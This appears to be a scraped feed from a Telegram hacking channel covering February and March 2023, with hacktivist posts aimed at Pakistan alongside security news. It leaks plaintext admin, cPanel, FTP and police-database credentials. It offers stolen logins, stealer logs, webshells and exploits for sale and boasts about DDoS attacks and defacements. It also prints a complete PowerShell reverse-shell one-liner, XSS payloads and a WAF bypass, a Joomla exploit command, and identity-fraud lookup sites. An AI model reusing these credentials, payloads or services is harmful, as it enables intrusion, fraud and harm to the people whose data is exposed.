Date Content Media
2023-03-30 01:07:34 data above 👆
2023-03-30 01:07:33
2023-03-30 01:07:26
2023-03-30 01:07:08
2023-03-30 01:07:07
2023-03-30 01:07:06
2023-03-29 18:50:42
2023-03-29 17:21:58
Pakistan Ministry Of Defence have been robbed.Defence Deal of China-Pakistan for 20 J-10CE & 240 PL-15E Missiles is displayed for your reference.
2023-03-29 16:37:08
2023-03-29 14:24:24
FTP Username: server: & explicit FTPS port: 21FTP pass : IndianCyberPwnage@w3b_1nj3c70r
2023-03-29 13:51:41
☢️ FOR SALE🚨 X1000 Wordpress Login 💎☢️ FOR SALE🚨➖➖➖➖➖➖➖➖➖➖💰 Price:100$🪙 Payment BTC 👉 For Buy: @Hajit00n 🏆➖➖➖➖➖➖➖➖➖➖ Images
2023-03-29 13:41:47
🔥 Free Access (Uploader) 💎🧑‍💻 @LegionLeaker
2023-03-29 11:24:29
🚨 FOR SALE☢️➖➖➖➖➖➖➖➖➖➖🪙Domain: & .id⭐️ ▶️ ▶️ ⭐️ ☢️ FOR SALE🚨➖➖➖➖➖➖➖➖➖➖💰 Price:60$🪙 Payment BTC 👉 For Buy: @Hajit00n 🏆
2023-03-29 03:21:29
None Images
2023-03-29 02:26:50
🚨 Viewers Discretion is Adviced 🇵🇰Reportedly 1 woman lost life and many injured in the rush to buy flour in Sahiwal Park, while the condition of three to four women is said to be critical : Local media Location: Sahiwal - Pakistan
2023-03-28 10:09:45
2023-03-28 09:40:21
A truck carrying ‘atta’ / flour is looted in Peshawar, Pakistan.But according to alleged factchecker Mohd. Zubair - India ranks 126th on the World Happines Index, while Pakistan is at 108 in the same
2023-03-28 08:44:28
2023-03-28 07:29:47
databse creddentions of Bangladesh police'I{0e$b{05CA{'
2023-03-28 06:52:54 😈Social Media Marketing Hacks at one place😁 Images
2023-03-28 06:34:04
Security Fucker🎨Hacking Site Hacked 😐grow th hacking bites 😈 Images
2023-03-28 02:45:41
pakcricknews 😂 Images
2023-03-28 02:30:29
Pakistan Documents LeakedThe information isn't really useful for novice users but could be usefulFor some registration purposedownload: Images
2023-03-28 02:21:05
📣-Welcome To Our Group VIP-💎➖➖➖➖➖➖➖➖➖➖💰-Price -25$ - ➖➖➖➖➖➖➖➖➖➖➡️ Shells Method & Paid Exploits➡️ Exploits - Leaked & Paid➡️ Stealers Logs - Fresh ➡️ ComboList - Leads - Mail Access ➡️ New Scampages 2022 - Priv8 ➡️ Tools useful for your work ➡️ Laravel - WordPress Exploits ➡️ cPanels - Mailers - Smtps➡️ Method Making Wordpress & Laravel Sites ➖➖➖➖➖➖➖➖➖➖ 🔛 Payment BTC ⚡️ JOIN NOW - @Hajit00n 🎨➖➖➖➖➖➖➖➖➖➖
2023-03-28 02:19:06
✅FOR SALE✅🛒Hacking Tools🛒Banking Logs🛒 Webshells🛒Laravel list🛒Wordpress list🛒 Email's List✅FOR SALE✅🛒 For Buy: @Hajit00n
2023-03-28 02:15:01
✅ sell Hight DA ⚡️💰 Price: 50$🛒 For Buy: @Hajit00n
2023-03-28 02:10:10
PK Admin 😈 admin:Karachi@2018 Admin:eph123* admin:@EcoSet@11@ admin:koppy123@7872 admin:stone@real786 Tana786:@Tahzeeb@pret11 admin:cPF*xi!(3ILt&CdzrzJ Sayyam:Yag9WavA9bK#sovP admin:natsolar@admin admin-adeel:mTqU2)Gwg9k0NjveO8%CeWm) admin:$P$BfOAXfmzVYq1lo rechargmayor567:Pc(4!4BHLeWeZ%FJGwI2Ji$W@Hajit00n
2023-03-28 00:50:32
PK cpanel 😈 wwwsarcocom:QpBx*hwiJU}# | Domains: 1 | freshtogo:cx80GgCs23 | Domains: 2 | | freshtogo.pk | Domains: 0 | natsolar:Q6g*6a67PsGn#Y | Domains: 2 | |
2023-03-28 00:46:40 🤘😈卩ro 爪Cracker 😂❤️
2023-03-28 00:26:21
💥How we broke PHP, hacked Pornhub and earned $20,000tl;dr:💾We have gained RCE on and have earned a $20,000 bug bounty on Hackerone.💾We have found two UAF vulns in PHP’s GC algorithm.💾Those vulnerabilities were remotely exploitable over PHP’s unserialize function.💾We were also awarded with $2,000 by the Internet Bug Bounty committee (c.f. Hackerone). Images Images Images
2023-03-27 13:59:08 collection all rounder databaseShare now
2023-03-27 07:59:01 can join this channel
2023-03-26 13:57:51
ADVANCE FOOTPRINTING SESSION FOR BEGINNERS ✌️BY - @x_cyanide_x TIME - 26 march(TODAY) at 7 :30 PMOUR WEBSITE - system32.inkONLY ON THIS DISCUSSION GROUP👇👇👇@cyberdemonsD#happyhacking
2023-03-26 12:01:19
2023-03-26 04:15:42
Mission Successful 🇮🇳🇮🇳🇮🇳
2023-03-25 19:18:23
🎈 happy Birthday Sir @MCracker2002 🎈आप आशावाद और कड़ी मेहनत के अवतार हैं।💕 हमें हर दिन प्रेरित करने के लिए धन्यवाद। 💕जन्मदिन 🎂 की शुभकामना गुरुजी @MCracker2002
2023-03-25 17:41:41
Hello guys I made a crypto hacking class how to 1.hack how to generate seed 2.brute forces of crypto seed 3.blockchain transaction finder 4.seed grabber 5.tron private key finder 12 phrases + 1 6.NFT seed grabber 7.Trust wallet Seed grabber 8.ledger and cold wallet Grabber8.brain flayer cracking 9.crypto phishing 10. Development of cold and hot wallet 11.cracking wallet.dat files @alex14324
2023-03-25 09:07:24
🍭 Free useful resources to learn Machine Learning 🍭👉 Google👉 Leetcode👉 Hackerrank👉 FreeCodeCamp👉 Kaggle👉 Geeksforgeeks👉 Create ML Models👉 Machine Learning Test Cheat Sheet━ POSTED BY @iishantt ━ 
2023-03-24 20:46:20
2023-03-24 14:42:37
2023-03-24 12:51:10
Remote unauthenticated system and cloud takeover found in major AI tool March 24, 2023 at 05:24PM by FlyingTrianglevia reddit
2023-03-24 12:31:31
2023-03-24 09:36:15
|Pwn2Own Vancouver 2023 - Day One Results|💥 STAR Labs was able to execute a 2-bug chain against Microsoft SharePoint. They earn $100,000 and 10 Master of Pwn points💥 Bien Pham from Qrious Security used an OOB Read and a stacked-based buffer overflow to exploit Oracle VirtualBox. He earns $40,000 and 4 Master of Pwn points.💥 Synacktiv was able to execute their TOCTOU attack against Tesla – Gateway. They earn $100,000 as well as 10 Master of Pwn points and a Tesla Model 3.💥STAR Labs successfully executed their attack against Ubuntu Desktop, but the exploit was previously known. They still earn $15,000 and 1.5 Master of Pwn points.💥 Marcin Wiązowski used an improper input validation bug to elevate privileges on Windows 11. He earns $30,000 and 3 Master of Pwn points.💥 Synacktiv used a TOCTOU bug to escalate privileges on Apple macOS. They earn $40,000 and 4 Master of Pwn points.
2023-03-23 11:23:04
2023-03-23 09:48:21
2023-03-22 15:49:54
Join our group for Cyber security
2023-03-22 15:30:07
#USEFUL SITES TO USE ON (Some Links Not Up To Date)BROWSER FINGERPRINT TESThttps://panopticick.eff.org LICENSE GENERATORhttps://www.elfqrin.com LEAK TESTdnsleaktest.com OFFICE PHONE CODEShttps://www.allareacodes.comSMS VERIFICATIONSmspool.net PHONEhttps://www.spooftel.com / AGENT CHECKERhttp://whatsmyuseragent.comFAX SENDER UDEMY COURSEShttps://www.zapcourses.comhttps://www.freshersgold.comCUSTOM/FAKE RECEIPT MAKER VALIDATORhttp://www.ssnvalidator.comSSN DECODER CHECKER SEARCHhttp://www.feinsearch.comhttps://www.einfinder.comhtp:// RDP ACCEPTING BITCOINıxdedicvhnguh5s6k.onion/SSN/DOB SEARCHhttps://ssndob.cchttps://robocheck.cmMMN AUTOSEARCHarchives.comancestry.comBACKGROUND CHECKhttp://www.intelius.comhttp://checkmate.comhttp://equifax.comhttp://thatsthem.comhttps://www.mylife.com REPORThttps://www.quizzle.com➖➖➖➖➖➖➖➖➖➖
2023-03-22 12:21:51
💥"Actual" image recovery:1️⃣Take a JPEG image2️⃣Make a copy of it3️⃣Crop it in Snipping Tool4️⃣Save/overwrite4️⃣In a hex editor, overwrite the EOI Marker (0xFFD9)5️⃣Repair it at http://jpg.repair6️⃣Wonder how secure your cropped image data is Images
2023-03-22 03:17:24
Mitigating SSRF in 2023 March 21, 2023 at 08:03PM by l_tennantvia reddit
2023-03-21 00:48:07
bypass for the FortiWeb (Fortinet) WAFusage:"><iframe src=//> i.e. instead of the standard XSS payload to execute js Images
2023-03-21 00:44:38
2023-03-20 21:34:00
Join our group for more such Cyber security
2023-03-20 18:23:09
A video on Digital ForensicsVolatilityA video on Digital Forensics
2023-03-20 13:22:49
💥Shannon Baseband: Intra-object overflow in NrSmPcoCodec when decoding reserved options(CVE-2023-26076).There is an intra-object overflow in Shannon Baseband, inside the 5G SM protocol implementation (NrSmMsgCodec as it’s called in Shannon according to debug strings), when decoding the “Extended protocol configuration options” message (IEI = 0x7B).The problem is that the size of the content isn’t checked before copying it. As the length of content can be up to 255 bytes, copying the content to one of the 6 reservedPco buffers can result in an OOB write.The array that holds the “Reserved” option data isn’t in a standalone allocation, rather this array is a part of a larger structure. Thus, an OOB write as described above overwrites other data within the same structure. It is currently unclear what kind of data lies after the 6 reservedPco buffers within reach of the overwrite.🔖An “Extended protocol configuration options” message that triggers the overflow is provided in epco-reserved-poc.dat.
2023-03-19 08:10:13
PowerShell opens a TCP socket on the remote server and executes the input as a command, sending the output back.Stupid backdoor!usage:powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
2023-03-18 14:01:17
2023-03-18 11:57:53
Federal agents of U.S. law enforcement arrested on Wednesday have arrested Conor Brian Fitzpatrick, a Peekskill, New York resident, who allegedly operated the infamous dark web data breach site, "BreachForums." The site, which hosted stolen databases from nearly 1,000 companies and websites, has been a significant player in the cybercrime ecosystem.Fitzpatrick, who went by the online alias "Pompompurin," was charged with a single count of conspiracy to commit access device fraud. BreachForums offered stolen personal information, including names, emails, and passwords, for sale to users. These databases were often used for fraudulent activities. Fitzpatrick's arrest took place at his home, where he admitted to using the alias "Pompompurin" and operating BreachForums.In an affidavit filed with the District Court for the Southern District of New York, FBI Special Agent John Langmire said that at around 4:30 p.m. on March 15, 2023, he led a team of law enforcement agents that made a probable cause arrest of a Conor Brian Fitzpatrick in Peekskill, NY.#stay safe while hacking "ethically"#Focus on your OPSEC Images
2023-03-18 11:24:41
This is the translated message of the same Russian group who put the screenshot of Hacked Indian Portals earlier. Now, Delivers the post attack confession.
2023-03-18 04:29:32
2023-03-17 13:53:18
2023-03-17 10:47:05
🔥Multiple Internet to Baseband Remote Code Execution Vulnerabilities in Exynos Modems Until security updates are available, users who wish to protect themselves from the baseband remote code execution vulnerabilities in Samsung’s Exynos chipsets can turn off Wi-Fi calling and Voice-over-LTE (VoLTE) in their device settings.Turning off these settings will remove the exploitation risk of these vulnerabilities.Chipsets to devices, affected products likely include:💾Mobile devices from Samsung, including those in the S22, M33, M13, M12, A71, A53, A33, A21, A13, A12 and A04 series;💾Mobile devices from Vivo, including those in the S16, S15, S6, X70, X60 and X30 series;💾The Pixel 6 and Pixel 7 series of devices from Google;💾any wearables that use the Exynos W920 chipset; and💾any vehicles that use the Exynos Auto T5123 chipset. Images
2023-03-17 01:27:43
In India the best way to come in limelight or Increase Buisness is to abuse the sentiments against the nation itself, People will start talking about you or could be in your perimeter.Same happening in cybersecurity industry where online telegram users of so called company just see the posts of small kids attacking websites of India which dont have any severe vulnerability of Any APT level/type attack but portraits as huge attack or they are the best company. How ? With telegramic employees ?? Seriously !!! Employees Who see the posts of script kiddies on telegram and makes out the reasearch report. No it will be wrong if i also said research report actually that is paid media reports which is published to make the company big.Earlier also that company with zero knowledge of employees published the report about malaysian hackers who were just a script Kiddies.In fact, There are many State Sponsered APT level workers who continuously work for the nation in every country, You never know. The real attacks should be researched out not any attacks which is publically available.The old generation was disgusting in field of understanding the cybersecurity but these kind of people make this today's generation fool too.
2023-03-16 21:43:55
You can join our group for more such Cyber security
2023-03-16 21:42:20
2023-03-16 15:46:13
How Scammers Scam you To Show You How they hack Android using PDF They Use Old Adobe App (A RCE VULN. In IT) to Exploit Android full Blog:
2023-03-16 15:34:51
2023-03-16 13:16:17
2023-03-16 13:16:16
ETH 💸 MINER/FINDER SCAM exposedBy @Devil_Anon 💻☢️Watch the video▶️ to see the illustration on how it's done, and get the code from our forum post below.Spread awareness🎙📞 and let more people be aware of this trick which many people are being ripped off upon.Share🌐 and support⭐️@cyberhellcommunity
2023-03-16 08:37:29
2023-03-16 05:59:34
gg's hacker's ( have a good day —❤️ ‼️Here we go again Use AI to generate the perfect professional excuse 😂😂#hacker_bano_chutiya_nhe 👀👀
2023-03-15 12:13:48
2023-03-15 07:10:02
Vulnerabilities in the TPM 2.0 reference implementation codeBlog+TMP_vuln_POC =
2023-03-14 14:57:00
🔥Experimental navigation object contains a new DOM XSS source! navigation.currentEntry.urlnavigation.entries()[0].url Images
2023-03-13 14:29:47
Join our group for Exclusive Cyber security, pen testing, bug hunting and ethical hacking content.Inviting you all to come and join our
2023-03-13 02:39:39
2023-03-12 20:36:51 our group for more such Cyber security content
2023-03-12 11:21:45
Nmap:- Firewall evasion/Bypass, MTU and fragmentation.By @Devil_Anon 😈What is firewall evasion ❔This technique refers to generating or manually specifying the IP Addresses of the decoys to evade IDS / Firewalls. It appears to the target as well as the host are scanning the network. This technique makes it really difficult for the IDS / Firewalls to determine which IP Address is actually scanning the network and which IP addresses are a decoy.Show reactions 💯❤️ and enjoy the video.Share and promote@cyberhellcommunityComment section :- HERE
2023-03-12 08:34:17
Hello Pakistan 👋Aapne ghabrana nahi hai.
2023-03-11 18:36:54 our group for more such Cyber security content
2023-03-11 08:43:05
⚡⚡WATCH AND SPREAD!!🇮🇳🇮🇳🔺@AngrySaffron
2023-03-11 06:48:16
2023-03-11 06:16:55
Summary: In span of 2years NITB hosted 50-70+ internal portals for pakistan government. I think there is no need to write more.
2023-03-10 01:59:09
💥The Untold Story of the BlackLotus UEFI Bootkit🔖Semantic-based rule to cover malicious bootloader components from the BlackLotus bootkit(for FwHunt Community Scanner)
2023-03-08 07:56:28
2023-03-08 07:36:34
कुछ सपने है इस बेदर्द जिन्दगी में,जिन्हें पाने कि चाह में हम खोए हैं।जिस समय ये दुनियां वाले आराम से सोए रहते है,उस समय हम अपने काम में शिद्दत से खोए रहते है.... Written by:- @lexlegion "Specially for Hacker's"
2023-03-08 07:25:20
Wishing you a very colorful and joyous Holi! On the happy occasion of Holi, may your life always be filled with the colors of joy and happiness.#Jai_Radhe_Krishna#DDoS_Evil_Family
2023-03-07 10:19:09
💥You can use the experimental 'navigation' object to trigger JS execution in Chrome.<script>navigation.navigate('javascript:alert(1)')</script> Images
2023-03-06 15:04:51 Pakistan#OPPK
2023-03-06 02:09:58
🤔CVE-2023-21716 (Microsoft Word RCE vuln) Python PoC
2023-03-06 01:15:11
2023-03-05 10:59:47
Check Out These SitesRedefaced By Indian Hackers 😘Power Of Indian Hackers &Feel The Power Of Indians🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮
2023-03-05 10:59:37
Hacked By EagleCyber #TeamArmyBawangMalaysia #StucxnetCrewMalaysia #Khalifahcybercrew #EagleCyber #GhostClanOffical #KingsmenWorld #GhostArmy16 #AnonManK #DarkHCyberXArmy #DarkCyberXPravasiArmy #DarkHCyberXArmy #NinjaCrewCyberGhost #UndergroundGhostCrew #pejuangcyber #LcmySecTeam #K𝐚𝐦𝐩𝐮𝐧𝐠G𝐡𝐨𝐬𝐭𝐀𝐜𝐚𝐝𝐞𝐦𝐲𝐃𝐃𝐨𝐬𝐂𝐫3𝐰 #KampungGhostDDosCyberArmy's#KomunitiSiberMalaysia
2023-03-05 04:15:37
2023-03-05 02:39:05
💥Nuclei-templates that help during the bug bounty hunting process.
2023-03-05 02:28:27
Cortex XDR Config Extractor is a tool is meant to be used during Red Team Assessments and to audit the XDR Settings. With this tool its possible to parse the Database Lock Files of the Cortex XDR Agent by Palo Alto Networks and extract Agent Settings, the Hash and Salt of the Uninstall Password, as well as possible Exclusions.Supported Extractions:Uninstall Password Hash & SaltExcluded Signer NamesDLL Security Exclusions & SettingsPE Security Exclusions & SettingsOffice Files Security Exclusions & SettingsCredential Gathering Module ExclusionsWebshell Protection Module ExclusionsChildprocess Executionchain ExclusionsBehavorial Threat Module ExclusionsLocal Malware Scan Module ExclusionsMemory Protection Module StatusGlobal Hash ExclusionsRansomware Protection Module Modus & SettingsDownload:-
2023-03-04 10:59:02
The Land of missing peopleThat is what Balochistan is called by nowadays Following the request of these people, we announce #OpBalochistanTo the pakistan army and ISI, You lot really wouldn't last a minute with our penetration. But we do wish you enjoy XoXo ~GhostSec
2023-03-03 15:52:37
WEBSITE HACKING Tutorial✅🌐 (WORDPRESS){Web Analysis, info Enumeration, CVE Analysis and Admin Panel Bruteforce.}By @Devil_Anon Tool :- wpscan O.S :- kali What is website hacking ❔website hacking is simply the unauthorized and attack infiltration unto the vulnerability of a website in order to get access to the admin panel.Give reactions❤️ and enjoy the video✅Comment Section HERE
2023-03-03 14:53:28
⚙️ CamOver is a camera exploitation tool that allows to disclosure network camera admin password.Features:💾Exploits vulnerabilities in most popular camera models such as CCTV, GoAhead and Netwave.💾Optimized to exploit multiple cameras at one time from list with threading enabled.💾Simple CLI and API usage.⚙️ CamRaptor is a tool that exploits several vulnerabilities in popular DVR cameras to obtain network camera credentials.Features:💾Exploits vulnerabilities in most popular camera models such as Novo, CeNova and QSee.💾Optimized to exploit multiple cameras at one time from list with threading enabled.💾Simple CLI and API usage. Images
2023-03-03 11:40:57 Shopping Site Down By DdoS_Evil 😈😘
2023-03-03 07:35:01
2023-03-02 14:46:36
2023-03-02 01:10:45 This Site Is Permanently Gone 😂😙 sites went offline.. expect more attacks from PH and IND #fakpakpakpak #fckistan
2023-03-01 11:34:16
2023-03-01 07:42:46
Best Web Crawling :
2023-03-01 05:02:17 😈DDoS Done😈After Bypassing CloudFlare 🖕 Share And Support😈😈Evils Always Remains Evil😈
2023-03-01 01:31:01
📲ssl-kill-switch3 is a next-generation of iOS Tweak SSLKillSwitch(2) with much more functionality! Images
2023-02-28 08:23:05
2023-02-28 00:25:03
Пакистан, видно что мы там делаем?🥹PHOENIX❤ Images
2023-02-27 13:45:53
🔥APT38 Tactic PoC for Stealing 0-days 💾program based on APT38 North Korea-backed hackers tactic that used in targeting security researchers using a malicious Visual Studio project file (vcxproj) to steal their 0days.💾Once the program runs, it will infect all of your Visual Studio projectsDownload:-
2023-02-27 00:50:10
Шла вроде вторая неделя, я уже сбился со счета. Пакистану все так же похуй.
2023-02-26 04:44:29
Hello Guys,I am making an Private Page on regarding OSINTSo if anyone wants to contribute or help me to make this project successful will be highly appreciated if you are interested please contact me at if you want to be in my team please let me know.
2023-02-26 04:41:22 own repo for OSINT
2023-02-25 15:35:06
2023-02-25 08:02:34
😈When an evil hurts...😈DDoS Done of Targetted Country😈😈😈😈😈😈😈😈😈😈List of Pakistani Websites:-😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈https://laam.pk😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈https://www.pktrucks.com😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈For Support, Do Share As Much As Possible 😈
2023-02-25 07:59:49
2023-02-25 02:16:53
🔥Arm Mali: insufficient cache invalidation for non-page-aligned user buffer importsWhen a user buffer is imported into Mali and mapped into the GPU, Mali calls dma_map_page(). This implicitly does a dcache_clean_poc() on the mapped range (unless the kernel knows that the device is DMA-coherent) to ensure that dirty cache state is written back to main memory before the user buffer can be accessed by the GPU and possibly also uncached mappings on the CPU.However, when a user buffer is imported that does not begin/end at page boundaries, Mali still installs PTEs on the CPU and GPU that map the entire page, but only calls dma_map_page() on the user-specified range. This means that the rest of the page is mapped without any cache maintenance.Therefore, when the GPU is not cache-coherent (which Jahn think means there's no ACE or ACE-Lite) or when Mali creates uncached CPU-side mappings, malicious code can read stale memory contents. This is a problem if the last cache writeback happened before the kernel's page allocator zeroed the page and handed it to userspace, since that means the stale data we're reading is whatever the previous user of the page wrote into it.
2023-02-25 01:54:25
2023-02-24 20:43:22
A new blog on OSINT Bug Hunting seriesLearn dorks and filters of Shodan, LinkedIn, Dnsdumpster, GitHub dorks, Wayback machine, Google dorks and much more...Here is the link to the blog't seen the first part? Here is the link't seen the second part?Here is the link our group for such exclusive
2023-02-24 16:33:45
⚠️⚠️⚠️⚠️⚠️⚠️⚠️Hello homies. Wait for uploading soon music share and support Wait wait every day 1 music upload soon and download linkI have 900 music you don't know how is good
2023-02-24 16:10:33
💥Fancy new way to conceal XSS payloads(Assignable protocol with location)<script>location.protocol='javascript'</script>
2023-02-24 12:17:17
OpenSSH 9.1 exploit and Mass ScanVulnerability CVE-2023-25136 affects the SSH pre-authentication process. Using it, an attacker can corrupt memory and execute arbitrary code on a machine without being authenticated on the target server.Download:
2023-02-24 12:11:06
💥Patchless/breakpoint in process amsi bypass thingy with C#Download CS File:-
2023-02-24 12:00:30
❤️ is a fantastic website that offers a unique and exciting service similar to ChatGPT But Difreent is that its not ChatGPT All Your Answer Come Across To Our Bhagwat Geeta 🕉.Link :🤞Whether you want to know about science, technology, history, philosophy, or anything in between, has got you covered. It is designed to provide you with accurate and insightful answers to your queries, just like a human expert would.🛕Click Here To Visit
2023-02-24 02:23:09
CVE-2023-0754PTC Thingworx Edge C-SDK twHeader_fromStream Integer Overflow RCE VulnerabilityCVE-2023-0755PTC Thingworx Edge C-SDK mulitpartMessageStoreEntry_Create Array Indexing OOB Write RCE VulnerabilityDownload POC exploit:
2023-02-23 21:12:57
Hi Everyone!A new Blog on Burp Suite.Let's learn how to use it like a Cyber Security ProfessionalA beginners blog to take your first step towards Burp Suite Here is the link 🔗 our group for such exclusive
2023-02-23 15:26:01
2023-02-23 11:14:30
💥PS script to exploit ESC1/retrieve your own NTLM password hash using only built-in Windows binaries to generate the PFX.Download:
2023-02-22 12:18:46
2023-02-22 09:42:05
2023-02-22 09:42:04
2023-02-22 01:31:54
BREAKING: Russian hacker group Phoenix announces hacking major ministries of Pakistan Govt.The group called the hack "hacking the whole Pakistan."ब्रेकिंग: रूसी हैकर समूह फीनिक्स ने पाकिस्तान सरकार के प्रमुख मंत्रालयों को हैक करने की घोषणा की।समूह ने हैक को "पूरे पाकिस्तान को हैक करना" कहा।🔺Just In: @AngrySaffron
2023-02-21 19:43:32
A blog on NmapLet's learn how to use Nmap.Nmap commandsNmap cheat sheetNmap techniquesHere is a link to the blog our group for more exclusive cyber security
2023-02-21 13:50:14
🔥🔥🔥Fortinet FortiNAC CVE-2022-39952 Deep-Dive, PoC and IOCsAn external control of file name or path vulnerability [CWE-73] in FortiNAC webserver may allow an unauthenticated attacker to perform arbitrary write on the system.🔖PoC exploit here
2023-02-21 12:01:29
🔥🔥🔥REUnziP: Re-Exploiting Huawei Recovery With FaultyUSB(CVE-2022-44563, Toc-ToU race condition vuln can be exploited to achieve arbitrary code execution )This is a new vulnerability in a proprietary mode called “SD-Update”, which can once again be used to achieve arbitrary code execution in the recovery mode, enabling unauthentic firmware updates, firmware downgrades to a known vulnerable version or other system modifications. Taszk advisory for the vulnerability is published here. The story of exploiting this vulnerability was made interesting by the fact that, since the exploit abuses wrong assumptions about the behavior of an external SD card, we needed some hardware-fu to actually be able to trigger it. In this blog post, Lorant Szabo describe how we went about creating “FaultyUSB” - a custom Raspberry Pi based setup that emulates a maliciously behaving USB flash drive - and exploiting this vulnerability to achieve arbitrary code execution as root!
2023-02-21 11:31:00
2023-02-21 04:59:04 Pakistan Bhen chod Team Insane PK Check Out These Sites🤣🤣🤣🤣😂😂🤣😂🤣😂
2023-02-20 07:54:59
​​CeWLCustom Word List generatorBased on a discussion on PaulDotCom (episode 129) about creating custom word lists spidering a targets website and collecting unique words I decided to write CeWL, the Custom Word List generator. CeWL is a ruby app which spiders a given URL to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.By default, CeWL sticks to just the site you have specified and will go to a depth of 2 links, this behaviour can be changed by passing arguments. Be careful if setting a large depth and allowing it to go offsite, you could end up drifting on to a lot of other domains. All words of three characters and over are output to stdout. This length can be increased and the words can be written to a file rather than screen so the app can be automated.
2023-02-20 07:54:58
​​CommixAutomated All-in-One OS Command Injection Exploitation Tool. #redteam
2023-02-20 07:49:00
For basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon
2023-02-19 22:00:15
Wait is over!Here is the second part of the bug hunting seriesBug hunting with OSINTHere is the link't seen the first part? Don't worry here is the link for that:Link for part 1: our group for such amazing and exclusive contentDon't miss here is the link to join our
2023-02-19 02:54:09
Anonymous Spoof 😂😂 Porkies (pakistan/Bhikaristan)Now Anonymous Be Like:Humko barbad kardo B*******
2023-02-19 01:52:38
2023-02-18 13:04:19
Kindly, Be assured that we will contribute in Pakistan's cyber defence & will keep access of everywhere in pakistan wherever they shift.
2023-02-18 06:51:41
2023-02-18 00:49:09
महाशिवरात्रि कि हार्दिक शुभकामनाएं 🚩
2023-02-17 23:30:52
You can also join our group for such exclusive
2023-02-17 23:30:01
Here is a video on Packet sniffingIf you like then Kindly subscribe and watch the video till end. It will be a great support from your side.Let's see A video on Packet sniffing our group for Exclusive content
2023-02-17 09:09:26
2023-02-17 05:41:49 Defecement with Phantom
2023-02-17 04:58:06
CVE-2023-23752Joomla webservice endpoint accessPoChttpx -l ip.txt -path '/api/index.php/v1/config/application?public=true'
2023-02-16 22:22:34
Hello everyoneA blog on packet sniffing using Wireshark for beginners who want to know how further use Wireshark.Let's see blog + videoLet's learn and growHere is a link to the blog our group for more cyber security content. We are helping beginners to start there career in Cyber securityHere is the link to our Security
2023-02-16 13:50:35
2023-02-16 11:19:03
Cloud7 Bot 150$ For Free #GET SMTP/VPS/DATABASE From Config/Environment#WordPress Upload Shell (139 Exploit + Bypassing Shell)#WebMin 1,9xx Remote Code Execution#PresTaShop Upload Shell (57 Exploit +Bypassing Shell)#KcFinder,PHPUNIT,vBulletin,jQuery,osCommerce,Other Filemanager Mass upload shell#All CMS BRUTE FORCE 1000 WORDLISTS#Priv Bing Dorker 500 Page#Get IP From List Website #Joomla Upload Shell (102 Exploit + Bypassing Shell) <- Looping ExploitDownload:-
2023-02-16 10:17:25
2023-02-15 18:39:30
Hi Everyone!We all know lot of network based attacks are happening with the help of WiresharkBut do we really know how to use the Wireshark.Let's learn in detail like a professional.Use Wireshark like a Cyber Security Professional.Here is the link to the blog can learn lot of cyber security stuff on my website techofide.comAlso join this group for more Cyber Security Professional
2023-02-15 14:09:02
​​EdgeGPTReverse engineered API of Microsoft's Bing Chat
2023-02-15 08:42:14
2023-02-15 00:13:59
✌️😎 I love trolling such madafaka tharki
2023-02-14 21:20:20
A new video on OSINT bug hunting.I recommend you to watch it and learn latest techniques of data gathering and reconnaissance
2023-02-14 15:19:23 #PakistanTerrorist #FckPak
2023-02-14 12:02:40
Yesterday I found a shell(backdoor) of a der-rupiya hackers probably sponsered by chavanni Intelligence agency in one of the Indian Govt website. The total number of govt website hosted on that server was 70+ there, so it means any or all 70 websites could have been defaced against Indian govt any time, or could have been used in other mean.It was part of my official work so can't disclose more about website or servers in this channel and you must be aware that these things doesn't come out.Although, Vulnerabilities is patched.The shell implant date was of 26th January 2023, the same timeline when nagpur shell implant/leak occurred.It's good that one foothold was removed but one man can't do everything, all the geeks should contribute and report at least pass the Intel's to make Indian cyberspace safe.Don't think what the country will give you, think what you will give to the country.Winding up, You know what fun is still remaining about those (Script-kiddies) ? They dropped shell and trace of Indonasian hackers. Waah Tatte Pakistan Waaah. 😂 Sale apn yahan chaal se pehchaan lete hai kon belly dancer hai or kon bar dancer... 😉 😆😆
2023-02-14 09:17:54
2023-02-14 07:25:29
2023-02-13 21:30:54
Hello everyone! Here is our new article on Aircrack-ngThis will show you everything that you need to learn before start with a practical demonstrationBlog + Video
2023-02-13 16:05:45
📕Knockout Win Against TCC - 20+ NEW Ways to Bypass Your MacOS Privacy Mechanisms
2023-02-13 09:44:59
2023-02-12 15:22:45
​​DDoS-Protection-LiteAnti-DDoS-Lite (Anti-Crawler app) is a small PHP app to protect your site against DDoS attack.
2023-02-12 14:08:40
🔓CVE-2022-23935 exploit PoC exiftool version 12.37Usage:./CVE-2022-23935 <IP> <PORT>Download:
2023-02-12 12:32:47
​​ConfFuzzFuzzing for Interface VulnerabilitiesConfFuzz is an in-memory fuzzer aimed at detecting interface vulnerabilities in compartmentalized contexts. ConfFuzz is a cooperation between the University of Manchester, University Politehnica of Bucharest, Rice University, and It has been accepted to appear in NDSS'23.
2023-02-12 12:28:54
ExploitLeakedHandle: Identify and exploit leaked handles for local privilege escalation
2023-02-11 14:52:07
Hey everyone!Check out our another blog on SQL Injection.SQL Injection attack | Prevention| Cyber Security ProfessionalsLet's learn and grow together
2023-02-11 13:45:24
BokuLoader | is a Cobalt Strike User-Defined Reflective Loader written in Assembly & C for advanced evasion capabilities.Now supports: sleepmask, cleanup, and obfuscate evasion features!Download:
2023-02-11 11:44:48
2023-02-11 11:44:47
2023-02-11 11:04:14
Resources for Reverse Engineering Online Games#cybersecurity #infosec #hacking
2023-02-11 03:25:30
